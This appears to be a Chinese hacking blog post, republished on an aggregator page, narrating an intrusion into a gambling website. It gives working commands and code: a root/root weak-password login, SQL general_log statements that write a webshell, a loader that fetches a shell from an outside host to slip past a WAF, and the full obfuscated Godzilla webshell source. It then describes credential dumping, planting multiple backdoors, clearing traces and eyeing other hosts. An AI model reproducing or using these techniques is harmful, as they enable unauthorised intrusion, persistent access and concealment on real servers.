美文网首页黑客
简单绕过waf拿下赌博网站

简单绕过waf拿下赌博网站

作者: 黑战士安全 | 来源:发表于2021-03-12 15:36 被阅读0次

确定目标

收集信息

x.x.x.x

首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。

随手加个路径,报错了,当看到这个界面我瞬间就有思路了

为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的

upupw --> pmd

phpstudy --> phpmyadmin

突破点

这个集成环境包也有个phpinfo的页面,跟数据库管理界面

u.php

测试一下弱口令

root/root

连接成功后就可以看到phpinfo的页面

好了现在问题变成phpmyadmin拿shell

getshell

三步拿shell

set global general_log='on';

SET global general_log_file='D:/xxxx/WWW/cmd.php';

SELECT '<?php assert($_POST["cmd"]);?>';

当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对,可能存在waf

换了个免杀马试试,先写到txt里边看看成否成功

没有任何问题,下面直接写入php文件

可以写入,直接去连接shell

果然有waf,当时写入的时候就感觉到了,不免杀的shell,sql语句执行不了

绕过waf

怼了半天都不知道是什么鬼waf,用下载文件试试

为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';

SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'

访问11.php 就会生成shell.php

这里的shell也是用了哥斯拉的免杀shell

<?php

    session_start();

    @set_time_limit(0);

    @error_reporting(0);

    function E($D,$K){

        for($i=0;$i<strlen($D);$i++) {

            $D[$i] = $D[$i]^$K[$i+1&15];

        }

        return $D;

    }

    function Q($D){

        return base64_encode($D);

    }

    function O($D){

        return base64_decode($D);

    }

    $P='pass';

    $V='payload';

    $T='3c6e0b8a9c15224a';

    if (isset($_POST[$P])){

        $F=O(E(O($_POST[$P]),$T));

        if (isset($_SESSION[$V])){

            $L=$_SESSION[$V];

            $A=explode('|',$L);

            class C{public function nvoke($p) {eval($p."");}}

            $R=new C();

            $R->nvoke($A[0]);

            echo substr(md5($P.$T),0,16);

            echo Q(E(@run($F),$T));

            echo substr(md5($P.$T),16);

        }else{

            $_SESSION[$V]=$F;

        }

    }

尝试了这么多次

进程里没有waf进程

权限是system

脱源码

上传抓密码工具,直接获取管理密码,登上服务器

留后门,清理痕迹

多留几个后门,万一被删

这个网段还有这么多机器

源码

打开源码才发现waf是360webscan

相关文章

  • 简单绕过waf拿下赌博网站

    确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该...

  • 绕过WTS-WAF进行sql注入

    偶然看到一个网站存在sql注入,但是有waf,随手测试就绕过了,很简单的绕过姿势。(全程打马) 很明显语句被拦截了...

  • 🎪waf绕过

    ? waf注入绕过检测方法 云waf直接找真实ip就可绕过 方法总结:绕过waf的方法: 1、白名单绕过2、大小写...

  • 4、🍊Waf绕过姿势

    ?Waf绕过姿势:在攻与防的对立中寻求统一 ?在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。WAF为黑客...

  • 绕过waf

    绕过云锁进行SQL注入 EXP: 1.php?id=-1 union(select 1,2,3,@@datadir...

  • WAF绕过

    一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系...

  • 利用ASP.NET中的x-up-devcap-post-char

    以前我发表过几篇利用编码技术绕过WAF的文章。在文章中我不仅介绍了绕过WAF的方法,还明确指出WAF产品可以通过拦...

  • SQL注入专题(三)

    一、WAF及绕过WAF原理介绍 WAF的定义: waf,即web应用防火墙,是通过执行一系列针对http/http...

  • web渗透测试中WAF绕过讲解(三)规则层面的绕过注入

    0x01 前言 对于渗透测试人员来说掌握绕过各类WAF是一项重要的基本技能而WAF又分云WAF、硬件WAF...

  • XSS绕过WAF

    http://www.freebuf.com/articles/web/54686.html

网友评论

    本文标题:简单绕过waf拿下赌博网站

    本文链接:https://www.haomeiwen.com/subject/ndezqltx.html